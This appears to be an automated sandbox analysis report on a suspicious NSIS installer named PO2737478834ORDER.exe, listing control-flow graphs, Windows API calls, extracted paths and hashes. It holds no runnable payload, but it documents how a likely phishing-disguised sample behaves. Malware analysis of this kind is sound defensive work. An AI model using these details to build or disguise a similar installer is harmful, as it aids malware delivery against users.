                                                        • String ID: "$"C:\Users\user\Desktop\PO2737478834ORDER.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf$C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Berni72$C:\Users\user\Desktop$C:\Users\user\Desktop\PO2737478834ORDER.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`KNw$~nsu
                                                        • API String ID: 3776617018-3932939242
                                                        • Opcode ID: 9e76e0e7fa4598d4998c9c47d8edd6c076605abd8d11d3f634f2100633476e4e
                                                        • Instruction ID: fed38e33bd1ad5050a1aac335cdd74565c3a3e786a0889b069c8e2b205acfbdc
                                                        • Opcode Fuzzy Hash: 9e76e0e7fa4598d4998c9c47d8edd6c076605abd8d11d3f634f2100633476e4e
                                                        • Instruction Fuzzy Hash: 7CC108702047406AD721AF759D49A2F3EACEF85306F45443FF581B62D2CB7C8A598B2E

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 261 405326-405342 262 4054d1-4054d7 261->262 263 405348-40540f GetDlgItem * 3 call 40417a call 404a6b GetClientRect GetSystemMetrics SendMessageA * 2 261->263 265 405501-40550d 262->265 266 4054d9-4054fb GetDlgItem CreateThread FindCloseChangeNotification 262->266 285 405411-40542b SendMessageA * 2 263->285 286 40542d-405430 263->286 268 40552f-405535 265->268 269 40550f-405515 265->269 266->265 270 405537-40553d 268->270 271 40558a-40558d 268->271 273 405550-405557 call 4041ac 269->273 274 405517-40552a ShowWindow * 2 call 40417a 269->274 275 405563-405573 ShowWindow 270->275 276 40553f-40554b call 40411e 270->276 271->273 279 40558f-405595 271->279 282 40555c-405560 273->282 274->268 283 405583-405585 call 40411e 275->283 284 405575-40557e call 4051e8 275->284 276->273 279->273 287 405597-4055aa SendMessageA 279->287 283->271 284->283 285->286 290 405440-405457 call 404145 286->290 291 405432-40543e SendMessageA 286->291 292 4055b0-4055dc CreatePopupMenu call 406154 AppendMenuA 287->292 293 4056a7-4056a9 287->293 300 405459-40546d ShowWindow 290->300 301 40548d-4054ae GetDlgItem SendMessageA 290->301 291->290 298 4055f1-405607 TrackPopupMenu 292->298 299 4055de-4055ee GetWindowRect 292->299 293->282 298->293 302 40560d-405627 298->302 299->298 303 40547c 300->303 304 40546f-40547a ShowWindow 300->304 301->293 305 4054b4-4054cc SendMessageA * 2 301->305 306 40562c-405647 SendMessageA 302->306 307 405482-405488 call 40417a 303->307 304->307 305->293 306->306 308 405649-405669 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 306->308 307->301 310 40566b-40568b SendMessageA 308->310 310->310 311 40568d-4056a1 GlobalUnlock SetClipboardData CloseClipboard 310->311 311->293
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 00405385
                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405394
                                                        • GetClientRect.USER32(?,?), ref: 004053D1
                                                        • GetSystemMetrics.USER32(00000002), ref: 004053D8
                                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004053F9
                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040540A
                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040541D
                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040542B
                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040543E
                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405460
                                                        • ShowWindow.USER32(?,00000008), ref: 00405474
                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054A5
                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054BE
                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004054CA
                                                        • GetDlgItem.USER32(?,000003F8), ref: 004053A3
                                                          • Part of subcall function 0040417A: SendMessageA.USER32(00000028,?,00000001,00403FAA), ref: 00404188
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004054E6
                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000052BA,00000000), ref: 004054F4
                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054FB
                                                        • ShowWindow.USER32(00000000), ref: 0040551E
                                                        • ShowWindow.USER32(?,00000008), ref: 00405525
                                                        • ShowWindow.USER32(00000008), ref: 0040556B
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040559F
                                                        • CreatePopupMenu.USER32 ref: 004055B0
                                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055C5
                                                        • GetWindowRect.USER32(?,000000FF), ref: 004055E5
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055FE
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040563A
                                                        • OpenClipboard.USER32(00000000), ref: 0040564A
                                                        • EmptyClipboard.USER32 ref: 00405650
                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 00405659
                                                        • GlobalLock.KERNEL32(00000000), ref: 00405663
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405677
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405690
                                                        • SetClipboardData.USER32(00000001,00000000), ref: 0040569B
                                                        • CloseClipboard.USER32 ref: 004056A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                        • String ID: (B
                                                        • API String ID: 4154960007-3831730363
                                                        • Opcode ID: d3419562442177eea9b62adf59552d27b6df34544d2fada850110dc2e5599538
                                                        • Instruction ID: fe21aa704c045a880c187f0605a512594e5ece0db8e286b19571ae5c45aa8885
                                                        • Opcode Fuzzy Hash: d3419562442177eea9b62adf59552d27b6df34544d2fada850110dc2e5599538
                                                        • Instruction Fuzzy Hash: 23A15B71900608BFDB119FA4DE89EAE7B79FB48355F00403AFA41BA1A0C7794E51DF58

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 620 405889-4058af call 405b47 623 4058b1-4058c3 DeleteFileA 620->623 624 4058c8-4058cf 620->624 625 405a52-405a56 623->625 626 4058d1-4058d3 624->626 627 4058e2-4058f2 call 4060c1 624->627 628 405a00-405a05 626->628 629 4058d9-4058dc 626->629 635 405901-405902 call 405aa0 627->635 636 4058f4-4058ff lstrcatA 627->636 628->625 631 405a07-405a0a 628->631 629->627 629->628 633 405a14-405a1c call 406435 631->633 634 405a0c-405a12 631->634 633->625 644 405a1e-405a32 call 405a59 call 405841 633->644 634->625 638 405907-40590a 635->638 636->638 640 405915-40591b lstrcatA 638->640 641 40590c-405913 638->641 643 405920-40593e lstrlenA FindFirstFileA 640->643 641->640 641->643 645 405944-40595b call 405a84 643->645 646 4059f6-4059fa 643->646 659 405a34-405a37 644->659 660 405a4a-405a4d call 4051e8 644->660 653 405966-405969 645->653 654 40595d-405961 645->654 646->628 648 4059fc 646->648 648->628 657 40596b-405970 653->657 658 40597c-40598a call 4060c1 653->658 654->653 656 405963 654->656 656->653 662 405972-405974 657->662 663 4059d5-4059e7 FindNextFileA 657->663 671 4059a1-4059ac call 405841 658->671 672 40598c-405994 658->672 659->634 665 405a39-405a48 call 4051e8 call 405ea0 659->665 660->625 662->658 668 405976-40597a 662->668 663->645 666 4059ed-4059f0 FindClose 663->666 665->625 666->646 668->658 668->663 680 4059cd-4059d0 call 4051e8 671->680 681 4059ae-4059b1 671->681 672->663 673 405996-40599f call 405889 672->673 673->663 680->663 682 4059b3-4059c3 call 4051e8 call 405ea0 681->682 683 4059c5-4059cb 681->683 682->663 683->663
                                                        APIs
                                                        • DeleteFileA.KERNELBASE(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B2
                                                        • lstrcatA.KERNEL32(00421D30,\*.*,00421D30,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058FA
                                                        • lstrcatA.KERNEL32(?,0040A014,?,00421D30,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040591B
                                                        • lstrlenA.KERNEL32(?,?,0040A014,?,00421D30,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405921
                                                        • FindFirstFileA.KERNELBASE(00421D30,?,?,?,0040A014,?,00421D30,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405932
                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059DF
                                                        • FindClose.KERNEL32(00000000), ref: 004059F0
                                                        Strings
                                                        • "C:\Users\user\Desktop\PO2737478834ORDER.exe", xrefs: 00405889
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405896
                                                        • \*.*, xrefs: 004058F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: "C:\Users\user\Desktop\PO2737478834ORDER.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                        • API String ID: 2035342205-763538148
                                                        • Opcode ID: 26995f6469efc0b5a60458e08d56de8dc590e27ec954537a62243d1abfa56489
                                                        • Instruction ID: 41c2b5987dba1b2e33ef8c3f02a16f7fa1ffbccb66a0b3bb43d54024ecdcecbe
                                                        • Opcode Fuzzy Hash: 26995f6469efc0b5a60458e08d56de8dc590e27ec954537a62243d1abfa56489
                                                        • Instruction Fuzzy Hash: 6251D070900A04EACB21AB618C89BBF7B78EF42724F54427BF851B51D1D73C4982DF6A

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 853 406435-406449 FindFirstFileA 854 406456 853->854 855 40644b-406454 FindClose 853->855 856 406458-406459 854->856 855->856
                                                        APIs
                                                        • FindFirstFileA.KERNELBASE(774D3410,00422578,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,00405B8A,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 00406440
                                                        • FindClose.KERNEL32(00000000), ref: 0040644C
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\nsxE304.tmp, xrefs: 00406435
                                                        • x%B, xrefs: 00406436
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsxE304.tmp$x%B
                                                        • API String ID: 2295610775-1014700214
                                                        • Opcode ID: f29c590cbb4ae7880d615934e2c411517b6bf54f8089bedae6efd123f54e346e
                                                        • Instruction ID: 161293881315f5638f8ce2083a4c9c3eaa4ca925c072cbf9d6c71a91d4c8f3d6
                                                        • Opcode Fuzzy Hash: f29c590cbb4ae7880d615934e2c411517b6bf54f8089bedae6efd123f54e346e
                                                        • Instruction Fuzzy Hash: FED01231944130ABC3502B386E0C85B7B599F153313A2CB36F56AF12F0CB788C6296AC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 634db48916f7a97cd593a88a8f27a2a6a53995630c6979533469a6cf2a501d9c
                                                        • Instruction ID: b77f02bc2ee5da486f1689b8d44b34109ba54b696cf3d27aba4845a127c97f42
                                                        • Opcode Fuzzy Hash: 634db48916f7a97cd593a88a8f27a2a6a53995630c6979533469a6cf2a501d9c
                                                        • Instruction Fuzzy Hash: CEF17671D00269CBCF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7385A86CF44

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 312 403c71-403c83 313 403dc4-403dd3 312->313 314 403c89-403c8f 312->314 316 403e22-403e37 313->316 317 403dd5-403e1d GetDlgItem * 2 call 404145 SetClassLongA call 40140b 313->317 314->313 315 403c95-403c9e 314->315 318 403ca0-403cad SetWindowPos 315->318 319 403cb3-403cb6 315->319 321 403e77-403e7c call 404191 316->321 322 403e39-403e3c 316->322 317->316 318->319 324 403cd0-403cd6 319->324 325 403cb8-403cca ShowWindow 319->325 330 403e81-403e9c 321->330 327 403e3e-403e49 call 401389 322->327 328 403e6f-403e71 322->328 331 403cf2-403cf5 324->331 332 403cd8-403ced DestroyWindow 324->332 325->324 327->328 343 403e4b-403e6a SendMessageA 327->343 328->321 329 404112 328->329 337 404114-40411b 329->337 335 403ea5-403eab 330->335 336 403e9e-403ea0 call 40140b 330->336 340 403cf7-403d03 SetWindowLongA 331->340 341 403d08-403d0e 331->341 338 4040ef-4040f5 332->338 346 4040d0-4040e9 DestroyWindow EndDialog 335->346 347 403eb1-403ebc 335->347 336->335 338->329 345 4040f7-4040fd 338->345 340->337 348 403db1-403dbf call 4041ac 341->348 349 403d14-403d25 GetDlgItem 341->349 343->337 345->329 351 4040ff-404108 ShowWindow 345->351 346->338 347->346 352 403ec2-403f0f call 406154 call 404145 * 3 GetDlgItem 347->352 348->337 353 403d44-403d47 349->353 354 403d27-403d3e SendMessageA IsWindowEnabled 349->354 351->329 382 403f11-403f16 352->382 383 403f19-403f55 ShowWindow KiUserCallbackDispatcher call 404167 EnableWindow 352->383 355 403d49-403d4a 353->355 356 403d4c-403d4f 353->356 354->329 354->353 359 403d7a-403d7f call 40411e 355->359 360 403d51-403d57 356->360 361 403d5d-403d62 356->361 359->348 363 403d98-403dab SendMessageA 360->363 364 403d59-403d5b 360->364 361->363 365 403d64-403d6a 361->365 363->348 364->359 368 403d81-403d8a call 40140b 365->368 369 403d6c-403d72 call 40140b 365->369 368->348 378 403d8c-403d96 368->378 380 403d78 369->380 378->380 380->359 382->383 386 403f57-403f58 383->386 387 403f5a 383->387 388 403f5c-403f8a GetSystemMenu EnableMenuItem SendMessageA 386->388 387->388 389 403f8c-403f9d SendMessageA 388->389 390 403f9f 388->390 391 403fa5-403fdf call 40417a call 403c52 call 4060c1 lstrlenA call 406154 SetWindowTextA call 401389 389->391 390->391 391->330 402 403fe5-403fe7 391->402 402->330 403 403fed-403ff1 402->403 404 404010-404024 DestroyWindow 403->404 405 403ff3-403ff9 403->405 404->338 407 40402a-404057 CreateDialogParamA 404->407 405->329 406 403fff-404005 405->406 406->330 408 40400b 406->408 407->338 409 40405d-4040b4 call 404145 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 407->409 408->329 409->329 414 4040b6-4040c9 ShowWindow call 404191 409->414 416 4040ce 414->416 416->338
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CAD
                                                        • ShowWindow.USER32(?), ref: 00403CCA
                                                        • DestroyWindow.USER32 ref: 00403CDE
                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403CFA
                                                        • GetDlgItem.USER32(?,?), ref: 00403D1B
                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D2F
                                                        • IsWindowEnabled.USER32(00000000), ref: 00403D36
                                                        • GetDlgItem.USER32(?,00000001), ref: 00403DE4
                                                        • GetDlgItem.USER32(?,00000002), ref: 00403DEE
                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403E08
                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E59
                                                        • GetDlgItem.USER32(?,00000003), ref: 00403EFF
                                                        • ShowWindow.USER32(00000000,?), ref: 00403F20
                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F32
                                                        • EnableWindow.USER32(?,?), ref: 00403F4D
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F63
                                                        • EnableMenuItem.USER32(00000000), ref: 00403F6A
                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F82
                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403F95
                                                        • lstrlenA.KERNEL32(Ramplor Setup: Installing,?,Ramplor Setup: Installing,00000000), ref: 00403FBF
                                                        • SetWindowTextA.USER32(?,Ramplor Setup: Installing), ref: 00403FCE
                                                        • ShowWindow.USER32(?,0000000A), ref: 00404102
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                        • String ID: Ramplor Setup: Installing
                                                        • API String ID: 3282139019-3580561697
                                                        • Opcode ID: 88472cc4d580f511b5a61cc057bfd9d3eebd51794cf4ea3c0b6aaec1f89545e8
                                                        • Instruction ID: b3becc50dc3ae915ab1c9f271a4527fb908fa7fae9a455a684dda11466253fc4
                                                        • Opcode Fuzzy Hash: 88472cc4d580f511b5a61cc057bfd9d3eebd51794cf4ea3c0b6aaec1f89545e8
                                                        • Instruction Fuzzy Hash: 77C11071600204BFDB206F61ED49E2B3AB8FB85706F50053EF651B51F1CB799982AB2D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 417 4038d4-4038ec call 4064ca 420 403900-403931 call 405fa8 417->420 421 4038ee-4038fe call 40601f 417->421 426 403933-403944 call 405fa8 420->426 427 403949-40394f lstrcatA 420->427 430 403954-40397d call 403b99 call 405b47 421->430 426->427 427->430 435 403983-403988 430->435 436 403a04-403a0c call 405b47 430->436 435->436 438 40398a-4039ae call 405fa8 435->438 442 403a1a-403a3f LoadImageA 436->442 443 403a0e-403a15 call 406154 436->443 438->436 444 4039b0-4039b2 438->444 446 403ac0-403ac8 call 40140b 442->446 447 403a41-403a71 RegisterClassA 442->447 443->442 448 4039c3-4039cf lstrlenA 444->448 449 4039b4-4039c1 call 405a84 444->449 460 403ad2-403add call 403b99 446->460 461 403aca-403acd 446->461 450 403a77-403abb SystemParametersInfoA CreateWindowExA 447->450 451 403b8f 447->451 455 4039d1-4039df lstrcmpiA 448->455 456 4039f7-4039ff call 405a59 call 4060c1 448->456 449->448 450->446 454 403b91-403b98 451->454 455->456 459 4039e1-4039eb GetFileAttributesA 455->459 456->436 463 4039f1-4039f2 call 405aa0 459->463 464 4039ed-4039ef 459->464 470 403ae3-403afd ShowWindow call 40645c 460->470 471 403b66-403b67 call 4052ba 460->471 461->454 463->456 464->456 464->463 476 403b09-403b1b GetClassInfoA 470->476 477 403aff-403b04 call 40645c 470->477 475 403b6c-403b6e 471->475 478 403b70-403b76 475->478 479 403b88-403b8a call 40140b 475->479 482 403b33-403b56 DialogBoxParamA call 40140b 476->482 483 403b1d-403b2d GetClassInfoA RegisterClassA 476->483 477->476 478->461 484 403b7c-403b83 call 40140b 478->484 479->451 488 403b5b-403b64 call 403824 482->488 483->482 484->461 488->454
                                                        APIs
                                                          • Part of subcall function 004064CA: GetModuleHandleA.KERNEL32(?,?,?,00403385,0000000B), ref: 004064DC
                                                          • Part of subcall function 004064CA: GetProcAddress.KERNEL32(00000000,?), ref: 004064F7
                                                        • lstrcatA.KERNEL32(1033,Ramplor Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Ramplor Setup: Installing,00000000,00000002,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO2737478834ORDER.exe",00000000), ref: 0040394F
                                                        • lstrlenA.KERNEL32(Exec,?,?,?,Exec,00000000,C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf,1033,Ramplor Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Ramplor Setup: Installing,00000000,00000002,774D3410), ref: 004039C4
                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 004039D7
                                                        • GetFileAttributesA.KERNEL32(Exec), ref: 004039E2
                                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf), ref: 00403A2B
                                                          • Part of subcall function 0040601F: wsprintfA.USER32 ref: 0040602C
                                                        • RegisterClassA.USER32(00423EC0), ref: 00403A68
                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A80
                                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AB5
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403AEB
                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,00423EC0), ref: 00403B17
                                                        • GetClassInfoA.USER32(00000000,RichEdit,00423EC0), ref: 00403B24
                                                        • RegisterClassA.USER32(00423EC0), ref: 00403B2D
                                                        • DialogBoxParamA.USER32(?,00000000,00403C71,00000000), ref: 00403B4C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
